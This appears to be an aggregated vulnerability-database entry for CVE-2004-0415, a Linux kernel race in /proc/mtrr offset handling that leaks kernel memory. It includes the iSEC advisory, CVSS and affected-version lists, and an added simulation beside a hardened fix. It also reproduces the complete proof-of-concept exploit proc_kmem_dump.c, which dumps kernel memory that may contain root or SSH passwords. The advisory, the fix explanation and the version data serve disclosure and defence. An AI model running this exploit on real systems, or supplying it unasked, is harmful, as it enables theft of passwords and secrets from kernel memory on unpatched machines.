CVE-2004-0415
CVSS 2.1
Published: 2004-11-23 00:00:00
Revised: 2017-07-10 21:30:08

[Original] Linux kernel does not properly convert 64-bit file offset pointers to 32 bits, which allows local users to access portions of kernel memory.


[CNNVD] Linux Kernel File Offset Pointer Sensitive Information Disclosure Vulnerability (CNNVD-200411-050)

        
        Linux is an open-source operating system.
        The Linux kernel mishandles 64-bit file offset pointers; a local attacker can exploit this to read sensitive information from kernel memory.
        The Linux kernel offers a file-handling API to user-space applications: a file is identified by its name and opened with the open(2) system call, which returns a file descriptor for the kernel's file object.
        One property of the file object is called the file offset (f_pos): every read or write starts at the position recorded there and advances it, and lseek(2) can also change it. It identifies the current read/write position inside the file image on the media.
        Recent Linux kernels contain two versions of the file-handling API, the old 32-bit one and the new 64-bit (LFS) one. The iSEC team found numerous places where 64-bit file offsets are converted to 32-bit ones incorrectly, and where the file offset member variable is accessed unsafely.
        iSEC found that most /proc entries (such as /proc/version) leak about one page of uninitialized kernel memory, which an attacker can use to obtain sensitive data.
        Through /proc/mtrr, large parts of kernel memory can be read; the advisory reports that the dump may contain the root password or the password typed at an OpenSSH login. Details of the technique are in:
        http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
        

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no special access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/o:linux:linux_kernel:2.4.19:pre1  Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre2  Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.4.18:pre1  Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre2  Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.4.0:test2  Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.4.6  Linux Kernel 2.4.6
cpe:/o:linux:linux_kernel:2.6.4  Linux Kernel 2.6.4
cpe:/o:linux:linux_kernel:2.4.7  Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.6.5  Linux Kernel 2.6.5
cpe:/o:linux:linux_kernel:2.4.0:test6  Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.0:test5  Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.4.0:test4  Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.0:test3  Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.4.17  Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.6.0:test4  Linux Kernel 2.6 test4
cpe:/o:linux:linux_kernel:2.4.0:test9  Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.18  Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.6.0:test3  Linux Kernel 2.6 test3
cpe:/o:linux:linux_kernel:2.4.0:test8  Linux Kernel 2.4.0 test8
cpe:/o:linux:linux_kernel:2.6.0:test2  Linux Kernel 2.6 test2
cpe:/o:linux:linux_kernel:2.4.0:test7  Linux Kernel 2.4.0 test7
cpe:/o:linux:linux_kernel:2.4.13  Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.6.0:test8  Linux Kernel 2.6 test8
cpe:/o:linux:linux_kernel:2.4.14  Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.6.0:test7  Linux Kernel 2.6 test7
cpe:/o:linux:linux_kernel:2.4.18::x86  Linux Kernel 2.4.18 x86
cpe:/o:linux:linux_kernel:2.4.19  Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.8  Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.6.0:test6  Linux Kernel 2.6 test6
cpe:/o:linux:linux_kernel:2.6.6  Linux Kernel 2.6.6
cpe:/o:linux:linux_kernel:2.4.9  Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.6.0:test5  Linux Kernel 2.6 test5
cpe:/o:linux:linux_kernel:2.6.7  Linux Kernel 2.6.7
cpe:/o:linux:linux_kernel:2.4.18:pre4  Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.4.19:pre5  Linux Kernel 2.4.19 pre5
cpe:/o:linux:linux_kernel:2.4.10  Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.18:pre3  Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.4.19:pre4  Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.15  Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.18:pre6  Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.4.16  Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.18:pre5  Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.4.19:pre6  Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.24_ow1  Linux Kernel 2.4.24 -ow1
cpe:/o:linux:linux_kernel:2.4.18:pre8  Linux Kernel 2.4.18 pre8
cpe:/o:linux:linux_kernel:2.4.18:pre7  Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.0  Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.11  Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.1  Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.4.12  Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.23_ow2  Linux Kernel 2.4.23 -ow2
cpe:/o:linux:linux_kernel:2.6.7:rc1  Linux Kernel 2.6.7 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.6:rc1  Linux Kernel 2.6.6 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.19:pre3  Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.0:test1  Linux Kernel 2.4.0 test1
cpe:/o:linux:linux_kernel:2.6_test9_cvs  Linux Kernel 2.6 test9 CVS
cpe:/o:linux:linux_kernel:2.6.0:test1  Linux Kernel 2.6 test1
cpe:/o:linux:linux_kernel:2.4.24  Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.4.25  Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.4.20  Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.4.21  Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.4.26  Linux Kernel 2.4.26
cpe:/o:redhat:fedora_core:core_1.0  Red Hat Fedora Core 1
cpe:/o:linux:linux_kernel:2.4.22  Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.23  Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.21:pre4  Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.4.21:pre7  Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.4.23:pre9  Linux Kernel 2.4.23 pre9
cpe:/o:trustix:secure_linux:2.1  Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0  Trustix Secure Linux 2.0
cpe:/o:linux:linux_kernel:2.4.21:pre1  Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.4.4  Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.6.2  Linux Kernel 2.6.2
cpe:/o:linux:linux_kernel:2.4.5  Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.6.3  Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.4.2  Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.6.0  Linux Kernel 2.6.0
cpe:/o:linux:linux_kernel:2.4.3  Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.6.1  Linux Kernel 2.6.1
cpe:/o:linux:linux_kernel:2.4.0:test12  Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.0:test10  Linux Kernel 2.4.0 test10
cpe:/o:linux:linux_kernel:2.4.0:test11  Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.6.0:test9  Linux Kernel 2.6 test9
cpe:/o:linux:linux_kernel:2.6.1:rc1  Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.1:rc2  Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.0:test10  Linux Kernel 2.6 test10
cpe:/o:linux:linux_kernel:2.6.0:test11  Linux Kernel 2.6 test11

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9965  Linux kernel does not properly convert 64-bit file offset pointers to 32 bits, which allows local users to access portions of kernel memory....
*OVAL describes in detail how this vulnerability is detected; the referenced OVAL definition contains further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0415
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0415
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-050
(official data source) CNNVD

- Other links and resources

ftp://patches.sgi.com/support/free/security/advisories/20040804-01-U.asc
(UNKNOWN)  SGI  20040804-01-U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000879
(UNKNOWN)  CONECTIVA  CLA-2004:879
http://www.gentoo.org/security/en/glsa/glsa-200408-24.xml
(UNKNOWN)  GENTOO  GLSA-200408-24
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:087
(UNKNOWN)  MANDRAKE  MDKSA-2004:087
http://www.redhat.com/support/errata/RHSA-2004-413.html
(UNKNOWN)  REDHAT  RHSA-2004:413
http://www.redhat.com/support/errata/RHSA-2004-418.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:418
https://exchange.xforce.ibmcloud.com/vulnerabilities/16877
(UNKNOWN)  XF  linux-pointer-info-disclosure(16877)

- Vulnerability information

Linux Kernel File Offset Pointer Sensitive Information Disclosure Vulnerability
Low severity  Design error
2004-11-23 00:00:00 2005-10-20 00:00:00
Local
        
        (Description identical to the CNNVD summary above.)
        

- Advisories and patches

        Vendor patches:
        Linux
        -----
        The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version (the Bugtraq entry further down lists the 2.4.27-pre and 2.6.8-rc kernels as not affected):
        
        http://www.kernel.org/

- Vulnerability information (375)

Linux Kernel File Offset Pointer Handling Memory Disclosure Exploit (EDBID:375)
linux local
2004-08-04 Verified
0 Paul Starzetz
N/A [download]
/*
 * CAN-2004-0415 / gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>

#include <sys/types.h>
#include <sys/stat.h>		/* struct stat / stat(2), used in main() */
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>

#include <linux/unistd.h>	/* _syscall5() macro: 2.4 / early 2.6 kernel headers only */

#include <asm/page.h>		/* PAGE_SIZE */


//	define machine mem size in MB (size of the kmem.dat dump file)
#define MEMSIZE	64



//	raw _llseek(2) wrapper: the 64-bit offset is passed as (hi, lo) halves
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
	  uint, wh);



void fatal(const char *msg)
{
	printf("\n");
	if(!errno) {
		fprintf(stderr, "FATAL ERROR: %s\n", msg);
	}
	else {
		perror(msg);
	}

	printf("\n");
	fflush(stdout);
	fflush(stderr);
	exit(31337);
}


static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
           size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;


//	child: close the mmap semaphore (madvise WILLNEED) while the parent sleeps in read()
int start_child(void *arg)
{
//	unlock parent & close semaphore
	go[0]=0;
	madvise(file, csize, MADV_DONTNEED);
	madvise(file, csize, MADV_SEQUENTIAL);
	gettimeofday(&tv1, NULL);
	read(pfd, buf, 0);

	go[0]=1;
	r = madvise(file, csize, MADV_WILLNEED);
	if(r)
		fatal("madvise");

//	parent blocked on mmap_sem? GOOD!
	if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
		r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
			if( r == -1 )
				fatal("lseek");
		printf("\n[+] Race won!"); fflush(stdout);
		go[0]=2;
	} else {
		printf("\n[-] Race lost %d, use another file!\n", go[1]);
		fflush(stdout);
		kill(getppid(), SIGTERM);
	}
	_exit(1);

return 0;
}


void usage(char *name)
{
	printf("\nUSAGE: %s <file not in cache>", name);
	printf("\n\n");
	exit(1);
}


int main(int ac, char **av)
{
	if(ac<2)
		usage(av[0]);

//	mmap big file not in cache
	r=stat(av[1], &st);
	if(r)
		fatal("stat file");
	csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

	fd=open(av[1], O_RDONLY);
	if(fd<0)
		fatal("open file");
	file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
	if(file==MAP_FAILED)
		fatal("mmap");
	close(fd);
	printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);
	fflush(stdout);

	pfd=open("/proc/mtrr", O_RDONLY);
	if(pfd<0)
		fatal("open");

	fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
	if(fd<0)
		fatal("open data");

	r=ftruncate(fd, fsize);
	if(r<0)
		fatal("ftruncate");

	buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if(buf==MAP_FAILED)
		fatal("mmap");
	close(fd);
	printf("\n[+] mmaped kernel data file at %p", buf);
	fflush(stdout);

//	clone thread wait for child sleep
	nc = nice(0);
	cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
		   CLONE_FILES|CLONE_VM, NULL);
	nice(19-nc);
	while(go[0]==0) {
		i++;
	}

//	try to read & sleep & move fpos to be negative
	gettimeofday(&tv1, NULL);
	go[1] = 1;
	r = read(pfd, buf, size );
	go[1] = 2;
	gettimeofday(&tv2, NULL);
	if(r<0)
		fatal("read");
	while(go[0]!=2) {
		i++;
	}

	us = tv2.tv_sec - tv1.tv_sec;
	us *= 1000000;
	us += (tv2.tv_usec - tv1.tv_usec) ;

	printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);
	r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
	if(r < 0 ) {
		printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");
		fflush(stdout);
		i=0;
		for(;;) {
			r = read(pfd, buf, PAGE_SIZE );
			if(r!=PAGE_SIZE)
				break;
			buf += PAGE_SIZE;
			i++;
			printf("\r    PAGE %6d", i); fflush(stdout);
		}
		printf("\n[+] done, err=%s", strerror(errno) );
		fflush(stdout);
	}
	close(pfd);

	printf("\n");
	sleep(1);
	kill(cpid, 9);

return 0;
}

// milw0rm.com [2004-08-04]
		

- Vulnerability information (F34055)

proc_kmem_dump.c (PacketStormID:F34055)
2004-08-16 00:00:00
iSEC Security Research  isec.pl
exploit,kernel,local
linux
CVE-2004-0415
[download]

Proc_kmem_dump is a local exploit for Linux kernels v2.4.0 through 2.4.26 which allows unprivileged users to read kernel memory.

- Vulnerability information (F34000)

Openwall Linux Kernel Patch (PacketStormID:F34000)
2004-08-10 00:00:00
Solar Designer  openwall.com
overflow,kernel
linux
CVE-2004-0497,CVE-2004-0415
[download]

The Openwall Linux kernel patch is a collection of security "hardening" features for the Linux kernel which can stop most 'cookbook' buffer overflow exploits. The patch can also add more privacy to the system by restricting access to parts of /proc so that users may not see what others are doing. Also tightens down file descriptors 0, 1, and 2, implements process limits and shared memory destruction.

- Vulnerability information (F33965)

isec-0016-procleaks.txt (PacketStormID:F33965)
2004-08-05 00:00:00
Paul Starzetz  isec.pl
exploit,kernel,local
linux
CVE-2004-0415
[download]

A critical security vulnerability has been found in the Linux kernel code handling 64bit file offset pointers. Successful exploitation allows local users to have access to kernel memory. Kernel series affected are 2.4.26 and below and 2.6.7 and below. Full exploit provided.

Synopsis:  Linux kernel file offset pointer handling
Product:   Linux kernel
Version:   2.4 up to and including 2.4.26, 2.6 up to and
           including 2.6.7
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
CVE:       CAN-2004-0415
Author:    Paul Starzetz <ihaquer@isec.pl>
Date:      Aug 04, 2004



Issue:
======

A  critical  security  vulnerability  has been found in the Linux kernel
code handling 64bit file offset pointers.


Details:
========

The  Linux  kernel  offers  a  file  handling  API   to   the   userland
applications.  Basically  a  file  can  be identified by a file name and
opened through the open(2) system call which  in  turn  returns  a  file
descriptor for the kernel file object.

One  of  the  properties  of  the  file object is something called 'file
offset' (f_pos member variable of the file object), which is advanced if
one  reads  or  writes  to the file. It can also be changed through the
lseek(2) system call and identifies the current writing/reading position
inside the file image on the media.

There  are two different versions of the file handling API inside recent
Linux kernels: the old 32 bit and the new (LFS)  64  bit  API.  We  have
identified  numerous places, where invalid conversions from 64 bit sized
file offsets to 32 bit ones as well  as  insecure  access  to  the  file
offset member variable take place.

We  have  found that most of the /proc entries (like /proc/version) leak
about one page of uninitialized kernel memory  and  can  be  exploited to
obtain sensitive data.

We  have  found  dozens  of places with suspicious or bogus code. One of
them resides in the MTRR handling code for the i386 architecture:


static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                         loff_t *ppos)
{
[1] if (*ppos >= ascii_buf_bytes) return 0;
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
    if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3] *ppos += len;
    return len;
}   /*  End Function mtrr_read  */


It is quite easy to see that since copy_to_user can  sleep,  the  second
reference  to  *ppos  may  use  another  value.  In other words, code
operating on the file->f_pos variable through a pointer must  be  atomic
with respect to the current thread. We expect even more trouble in the
SMP case.


Exploitation:
=============

In the following we want to concentrate on the mtrr.c code, however we
think  that  other  f_pos  handling  code  in  the  kernel  may also be
exploitable.

The idea is to use the blocking property of copy_to_user to advance  the
file->f_pos  file  offset  to  be negative allowing us to bypass the two
checks marked with [1] and [2] in the above code.

There are two situations where copy_to_user() will sleep if there is no
page  table entry for the corresponding location in the user buffer used
to receive the data:

- the underlying buffer maps a file which is  not  in  the  kernel  page
cache yet. The file content must be read from the disk first

-  the mmap_sem semaphore of the process's VM is in a closed state, that
is another thread sharing  the  same  VM  caused  a  down_write  on  the
semaphore.

We  use the second method as follows. One of two threads sharing same VM
issues a madvise(2) call on a VMA that maps some, sufficiently big  file
setting  the  madvise  flag to WILLNEED. This will issue a down_write on
the mmap semaphore and schedule a  read-ahead  request  for  the  mmaped
file.

The second thread issues in the meantime a read on the /proc/mtrr file,
thus going to sleep until the first thread returns from the madvise
system call. The two threads will be woken up in a FIFO manner, thus the
first thread runs first and can advance the file pointer of the proc
file  to  the  maximum  possible  value  of 0x7fffffffffffffff while the
second thread is still waiting in the scheduler queue for CPU  (in  the
non-SMP case).

After  the  place  marked  with [3] has been executed, the file position
will have a negative value and the checks [1] and [2] can be passed  for
any  buffer  length  supplied,  thus  leaking the kernel memory from the
address of ascii_buffer on to the user space.

We have attached a proof-of-concept exploit code  to  read  portions  of
kernel  memory.  Another  exploit  code  we have at our disposal can use
other /proc entries (like /proc/version) to  read  one  page  of  kernel
memory.
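The race described above, as an added example that is not part of the iSEC advisory or of the kernel: a user-space C model of the mtrr_read() pattern (checks [1], [2] and [3] as quoted above) beside a hardened rewrite, with a hook standing in for copy_to_user() sleeping so that the "other thread" can seek to 0x7fffffffffffffff between [2] and [3]. The kmem array, the 'A'/'K' fill patterns, the kaddr() helper that reproduces the i386 truncation of the 64-bit offset to 32 bits in pointer arithmetic, and the hardened function are all constructed here for the simulation; the hardened form is my rewrite, not the upstream patch, and mirrors the pattern the kernel later standardized as simple_read_from_buffer().

```c
/* Added example, not iSEC's or the kernel's code: user-space model of the race
 * in mtrr_read() on i386. kmem, fill patterns and the sleep hook are constructed. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

typedef int64_t koff_t;                  /* the kernel's 64-bit loff_t */

#define KMEM_SIZE  16384                 /* constructed "kernel memory" */
#define ASCII_OFF  1024                  /* where the MTRR text buffer sits */
#define ASCII_LEN  64                    /* ascii_buf_bytes in the real code */

static unsigned char kmem[KMEM_SIZE];
static unsigned char *ascii_buffer = kmem + ASCII_OFF;
static size_t ascii_buf_bytes = ASCII_LEN;
static long last_read_len;               /* return value of the last read in run_race() */

/* Stand-in for copy_to_user() sleeping: lets the "other thread" touch *ppos. */
typedef void (*sleep_hook_t)(koff_t *ppos);

/* i386 keeps only the low 32 bits of a 64-bit offset in pointer arithmetic, so
 * a negative koff_t becomes a small positive displacement (the CVE's 64->32 bug). */
static unsigned char *kaddr(koff_t off)
{
    return ascii_buffer + (uint32_t)off;
}

/* Vulnerable pattern: *ppos is read at [1], [2] and [3] around a sleeping call. */
static long mtrr_read_vuln(unsigned char *ubuf, size_t len, koff_t *ppos, sleep_hook_t hook)
{
    if (*ppos >= (koff_t)ascii_buf_bytes)                  /* [1] */
        return 0;
    if (*ppos + (koff_t)len > (koff_t)ascii_buf_bytes)     /* [2] */
        len = ascii_buf_bytes - (size_t)*ppos;
    unsigned char *src = kaddr(*ppos);   /* argument built before the call */
    if (hook)
        hook(ppos);                      /* copy_to_user() sleeps; racer seeks */
    memcpy(ubuf, src, len);
    /* [3] re-reads *ppos, now 0x7fffffffffffffff; the kernel's wrapping add makes
     * it negative. Unsigned arithmetic gives the same bits without signed overflow. */
    *ppos = (koff_t)((uint64_t)*ppos + (uint64_t)len);
    return (long)len;
}

/* Hardened form (my rewrite, not the upstream patch): snapshot the offset once,
 * validate and copy from the snapshot, store pos + len. The kernel later packaged
 * this pattern as simple_read_from_buffer(). */
static long mtrr_read_fixed(unsigned char *ubuf, size_t len, koff_t *ppos, sleep_hook_t hook)
{
    koff_t pos = *ppos;
    if (pos < 0)
        return -1;                       /* -EINVAL in the kernel */
    if ((uint64_t)pos >= ascii_buf_bytes)
        return 0;
    if (len > ascii_buf_bytes - (size_t)pos)
        len = ascii_buf_bytes - (size_t)pos;
    unsigned char *src = ascii_buffer + pos;   /* pos already range-checked */
    if (hook)
        hook(ppos);                      /* the racing seek lands but is ignored */
    memcpy(ubuf, src, len);
    *ppos = pos + (koff_t)len;           /* never exceeds ascii_buf_bytes */
    return (long)len;
}

/* Sibling thread winning the race: _llseek(pfd, 0x7fffffff, 0xffffffff, &off,
 * SEEK_SET) while the reader sleeps in copy_to_user(). */
static void racer_seeks_to_max(koff_t *ppos)
{
    *ppos = INT64_MAX;
}

/* proc_kmem_dump.c sequence: one raced read, then a normal read. Returns how many
 * bytes of the second read came from outside the MTRR buffer; last_read_len gets
 * that read's return value. */
static long run_race(int hardened)
{
    static unsigned char ubuf[4096];
    long (*rd)(unsigned char *, size_t, koff_t *, sleep_hook_t) =
        hardened ? mtrr_read_fixed : mtrr_read_vuln;
    koff_t fpos = 0;
    long leaked = 0;

    memset(kmem, 'K', sizeof kmem);             /* constructed kernel memory */
    memset(ascii_buffer, 'A', ascii_buf_bytes); /* constructed MTRR text */
    rd(ubuf, sizeof ubuf, &fpos, racer_seeks_to_max);
    last_read_len = rd(ubuf, sizeof ubuf, &fpos, NULL);
    for (long i = 0; i < last_read_len; i++)
        if (ubuf[i] != 'A')
            leaked++;
    return leaked;
}

int main(void)
{
    long leaked = run_race(0);
    printf("vulnerable: 2nd read %ld bytes, %ld from beyond the buffer\n", last_read_len, leaked);
    leaked = run_race(1);
    printf("hardened:   2nd read %ld bytes, %ld from beyond the buffer\n", last_read_len, leaked);
    return 0;
}
```

Against the vulnerable function the first read is clamped to the 64 buffer bytes, the racing seek lands while it "sleeps", and [3] leaves the offset at 0x800000000000003f: negative as a 64-bit value (so [1] and [2] pass for any length) but 63 once truncated to 32 bits, so the second read returns a full 4096 bytes starting at the last byte of the buffer and running on into the surrounding memory. The hardened function works from its snapshot, stores 64, and the second read hits end-of-file with nothing leaked.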


Impact:
=======

Since no special privileges are required to open the /proc/mtrr file for
reading any process may exploit the bug to read  huge  parts  of  kernel
memory.

The  kernel  memory  dump  may  include  very sensitive information like
hashed passwords from /etc/shadow or even the root password.

We have found in an experiment that after the root user logged in  using
ssh  (in our case it was OpenSSH using PAM), the root password was kept
in kernel memory. This is very surprising since sshd will quickly clean
(overwrite  with  zeros)  the memory portion used to store the password.
But the password may have made its way through various kernel paths like
pipes or sockets.

Tested  and known to be vulnerable kernel versions are all <= 2.4.26 and
<= 2.6.7. All users are encouraged to patch all  vulnerable  systems  as
soon  as appropriate vendor patches are released. There is no hotfix for
this vulnerability.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has  identified  the  vulnerability  and
performed  further  research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH  EXPRESS  PERMISSION  OF
ONE OF THE AUTHORS.


Disclaimer:
===========

This  document and all the information it contains are provided "as is",
for educational purposes only, without warranty  of  any  kind,  whether
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of  the  information   provided  in
this  document.  Liability  claims regarding damage caused by the use of
any information provided, including any kind  of  information  which  is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

(The appendix contains proc_kmem_dump.c, identical to the exploit reproduced above under EDBID:375.)

    

- Vulnerability information

8302
Linux Kernel File Offset Pointer Handling Memory
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

The Linux Kernel contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when invalid conversion from 64 bit file offsets to 32 bit file offsets occur, which may disclose kernel memory information resulting in a loss of confidentiality.

- Timeline

2004-08-04 Unknown
2004-08-04 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available from kernel.org to correct this issue. Some vendors such as RedHat have released patches which are made available to their customers. Please check with your respective vendor if applicable.

- Vulnerability information

Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memory Disclosure Vulnerability
Design Error 10852
Remote: No   Local: Yes
2004-08-04 12:00:00 2009-07-12 06:16:00
Discovery of this issue is credited to Paul Starzetz <ihaquer@isec.pl>.

- Affected program versions

VMWare ESX Server 2.1.2
VMWare ESX Server 2.1.1
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 2.0
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Enterprise Linux 2.0
SGI ProPack 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
Red Hat Fedora Core1
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.4.26
Linux kernel 2.4.25
Linux kernel 2.4.24 -ow1
Linux kernel 2.4.24
Linux kernel 2.4.23 -pre9
Linux kernel 2.4.23 -ow2
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.4.21 pre7
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
